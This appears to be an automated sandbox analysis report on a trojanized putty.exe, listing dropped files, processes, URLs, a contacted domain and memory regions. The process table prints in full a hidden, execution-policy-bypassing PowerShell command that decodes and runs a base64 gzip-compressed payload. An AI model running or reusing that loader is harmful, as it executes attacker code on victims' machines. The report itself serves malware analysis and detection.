Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
putty.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcfx5wob.j5h.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxj1zkei.vos.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TF6MZ5T3LM2G3X08J664.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\putty.exe
|
"C:\Users\user\Desktop\putty.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object
System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://github.com/llvm/llvm-project/
|
unknown
|
||
|
https://www.chiark.greenend.org.uk/~sgtatham/putty/
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
There are 2 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bonus2.corporatebonusapplication.local
|
unknown
|
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
522000
|
unkown
|
page execute and write copy
|
|
|
|
401000
|
unkown
|
page execute read
|
|
|
|
401000
|
unkown
|
page execute read
|
|
|
|
522000
|
unkown
|
page execute and write copy
|
|
|
|
7746000
|
heap
|
page read and write
|
||
|
3147000
|
heap
|
page read and write
|
||
|
4ADA000
|
trusted library allocation
|
page execute and read and write
|
||
|
5338000
|
trusted library allocation
|
page read and write
|
||
|
785D000
|
trusted library allocation
|
page read and write
|
||
|
919000
|
heap
|
page read and write
|
||
|
4AE2000
|
trusted library allocation
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
2920000
|
trusted library allocation
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
7740000
|
heap
|
page read and write
|
||
|
8935000
|
trusted library allocation
|
page read and write
|
||
|
4AB4000
|
trusted library allocation
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
321F000
|
stack
|
page read and write
|
||
|
5154000
|
trusted library allocation
|
page read and write
|
||
|
4FFE000
|
stack
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
722E000
|
stack
|
page read and write
|
||
|
58DA000
|
trusted library allocation
|
page read and write
|
||
|
2290000
|
heap
|
page read and write
|
||
|
49FE000
|
stack
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
50D0000
|
heap
|
page execute and read and write
|
||
|
96000
|
stack
|
page read and write
|
||
|
2FCB000
|
heap
|
page read and write
|
||
|
25D4000
|
heap
|
page read and write
|
||
|
497000
|
unkown
|
page readonly
|
||
|
77A5000
|
heap
|
page read and write
|
||
|
759000
|
heap
|
page read and write
|
||
|
22D0000
|
heap
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
4C1000
|
unkown
|
page write copy
|
||
|
78A0000
|
trusted library allocation
|
page read and write
|
||
|
779E000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
78C0000
|
trusted library allocation
|
page read and write
|
||
|
791E000
|
stack
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
58E4000
|
trusted library allocation
|
page read and write
|
||
|
2F19000
|
heap
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
5020000
|
heap
|
page execute and read and write
|
||
|
8480000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
8D9000
|
heap
|
page read and write
|
||
|
72EE000
|
stack
|
page read and write
|
||
|
22D9000
|
heap
|
page read and write
|
||
|
8AA000
|
heap
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
76F0000
|
heap
|
page read and write
|
||
|
4AB0000
|
trusted library allocation
|
page read and write
|
||
|
4B90000
|
heap
|
page readonly
|
||
|
79DD000
|
stack
|
page read and write
|
||
|
77BD000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
525000
|
unkown
|
page readonly
|
||
|
3009000
|
heap
|
page read and write
|
||
|
8560000
|
heap
|
page read and write
|
||
|
8566000
|
heap
|
page read and write
|
||
|
525000
|
unkown
|
page readonly
|
||
|
751E000
|
stack
|
page read and write
|
||
|
4B8E000
|
stack
|
page read and write
|
||
|
50E0000
|
heap
|
page read and write
|
||
|
915000
|
heap
|
page read and write
|
||
|
77E7000
|
heap
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
50D5000
|
heap
|
page execute and read and write
|
||
|
4A9E000
|
stack
|
page read and write
|
||
|
757000
|
heap
|
page read and write
|
||
|
314E000
|
heap
|
page read and write
|
||
|
2B6B000
|
stack
|
page read and write
|
||
|
2E9E000
|
stack
|
page read and write
|
||
|
4F6C000
|
stack
|
page read and write
|
||
|
497000
|
unkown
|
page readonly
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
492E000
|
stack
|
page read and write
|
||
|
7820000
|
trusted library allocation
|
page read and write
|
||
|
50F1000
|
trusted library allocation
|
page read and write
|
||
|
4AC9000
|
trusted library allocation
|
page read and write
|
||
|
7799000
|
heap
|
page read and write
|
||
|
58DE000
|
trusted library allocation
|
page read and write
|
||
|
6119000
|
trusted library allocation
|
page read and write
|
||
|
4BA8000
|
trusted library allocation
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
533A000
|
trusted library allocation
|
page read and write
|
||
|
7F5D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BA8000
|
stack
|
page read and write
|
||
|
4AD0000
|
trusted library allocation
|
page read and write
|
||
|
856A000
|
heap
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
25D0000
|
heap
|
page read and write
|
||
|
2E56000
|
heap
|
page read and write
|
||
|
2E20000
|
heap
|
page read and write
|
||
|
311E000
|
stack
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
736B000
|
stack
|
page read and write
|
||
|
777F000
|
heap
|
page read and write
|
||
|
3721000
|
heap
|
page read and write
|
||
|
58E2000
|
trusted library allocation
|
page read and write
|
||
|
58D7000
|
trusted library allocation
|
page read and write
|
||
|
4AC0000
|
trusted library allocation
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
2FCE000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page read and write
|
||
|
4AE0000
|
trusted library allocation
|
page read and write
|
||
|
78D0000
|
heap
|
page execute and read and write
|
||
|
795E000
|
stack
|
page read and write
|
||
|
771B000
|
heap
|
page read and write
|
||
|
5468000
|
trusted library allocation
|
page read and write
|
||
|
2F10000
|
heap
|
page read and write
|
||
|
2E30000
|
heap
|
page read and write
|
||
|
506E000
|
stack
|
page read and write
|
||
|
60F1000
|
trusted library allocation
|
page read and write
|
||
|
931000
|
heap
|
page read and write
|
||
|
5415000
|
trusted library allocation
|
page read and write
|
||
|
4ABD000
|
trusted library allocation
|
page execute and read and write
|
||
|
258E000
|
stack
|
page read and write
|
||
|
778B000
|
heap
|
page read and write
|
||
|
71AE000
|
stack
|
page read and write
|
||
|
629A000
|
trusted library allocation
|
page read and write
|
||
|
25CE000
|
stack
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page read and write
|
||
|
4B4E000
|
stack
|
page read and write
|
||
|
4FAE000
|
stack
|
page read and write
|
||
|
592E000
|
trusted library allocation
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
8AE000
|
heap
|
page read and write
|
||
|
2EDE000
|
stack
|
page read and write
|
||
|
757000
|
heap
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
799E000
|
stack
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page read and write
|
||
|
7601000
|
heap
|
page read and write
|
||
|
49BD000
|
stack
|
page read and write
|
||
|
71EF000
|
stack
|
page read and write
|
||
|
7840000
|
heap
|
page read and write
|
||
|
4C1000
|
unkown
|
page read and write
|
||
|
8550000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
4C6000
|
unkown
|
page readonly
|
||
|
7787000
|
heap
|
page read and write
|
||
|
50E7000
|
heap
|
page read and write
|
||
|
4C6000
|
unkown
|
page readonly
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
A9F000
|
stack
|
page read and write
|
||
|
3720000
|
heap
|
page read and write
|
||
|
615D000
|
trusted library allocation
|
page read and write
|
||
|
4BD0000
|
trusted library allocation
|
page read and write
|
||
|
84FD000
|
stack
|
page read and write
|
||
|
4AA0000
|
trusted library allocation
|
page read and write
|
||
|
22B0000
|
unkown
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
726A000
|
stack
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
78B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
3130000
|
heap
|
page read and write
|
||
|
4A3D000
|
stack
|
page read and write
|
||
|
77AC000
|
heap
|
page read and write
|
||
|
4BC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
916000
|
heap
|
page read and write
|
||
|
53D8000
|
trusted library allocation
|
page read and write
|
||
|
716B000
|
stack
|
page read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
8540000
|
heap
|
page read and write
|
||
|
5435000
|
trusted library allocation
|
page read and write
|
||
|
8470000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C3000
|
unkown
|
page read and write
|
||
|
5813000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
7830000
|
trusted library allocation
|
page read and write
|
||
|
4AB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
58E0000
|
trusted library allocation
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
4AE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
7889000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
2F78000
|
heap
|
page read and write
|
||
|
228E000
|
stack
|
page read and write
|
||
|
8D5000
|
heap
|
page read and write
|
||
|
5247000
|
trusted library allocation
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
254F000
|
stack
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
523000
|
unkown
|
page write copy
|
||
|
22D5000
|
heap
|
page read and write
|
||
|
870000
|
heap
|
page read and write
|
||
|
75DF000
|
stack
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
523000
|
unkown
|
page write copy
|
||
|
58DC000
|
trusted library allocation
|
page read and write
|
||
|
732E000
|
stack
|
page read and write
|
||
|
7810000
|
trusted library allocation
|
page read and write
|
||
|
33EF000
|
stack
|
page read and write
|
||
|
72AE000
|
stack
|
page read and write
|
||
|
853F000
|
stack
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
There are 197 hidden memdumps, click here to show them.